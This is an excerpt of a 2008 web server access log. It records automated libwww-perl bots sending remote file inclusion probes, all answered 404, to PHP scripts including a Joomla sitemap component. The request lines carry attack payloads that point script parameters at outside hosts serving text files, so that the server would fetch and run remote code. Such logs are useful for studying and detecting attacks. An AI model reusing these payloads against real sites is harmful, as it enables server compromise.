210.245.166.92 - - [30/Jul/2008:19:56:36 -0500] "GET /logs/access_log.1212883200/errors.php?error=http://www.adoradores.kit.net/general? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
210.245.166.92 - - [30/Jul/2008:19:56:36 -0500] "GET /errors.php?error=http://www.adoradores.kit.net/general? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
210.245.166.92 - - [30/Jul/2008:19:56:37 -0500] "GET /logs/errors.php?error=http://www.adoradores.kit.net/general? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
209.97.201.148 - - [30/Jul/2008:19:56:57 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sujianto.com/load.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
209.97.201.148 - - [30/Jul/2008:19:56:57 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sujianto.com/load.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
210.245.166.92 - - [30/Jul/2008:19:57:02 -0500] "GET /logs/access_log.1213142400/errors.php?error=http://www.adoradores.kit.net/general? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
67.77.184.232 - - [30/Jul/2008:19:57:53 -0500] "GET /logs/allinurl:mod.php?mod=siteinfo&id=http://www.goldenfirstumc.org/sistem.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
67.77.184.232 - - [30/Jul/2008:19:57:54 -0500] "GET /allinurl:mod.php?mod=siteinfo&id=http://www.goldenfirstumc.org/sistem.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
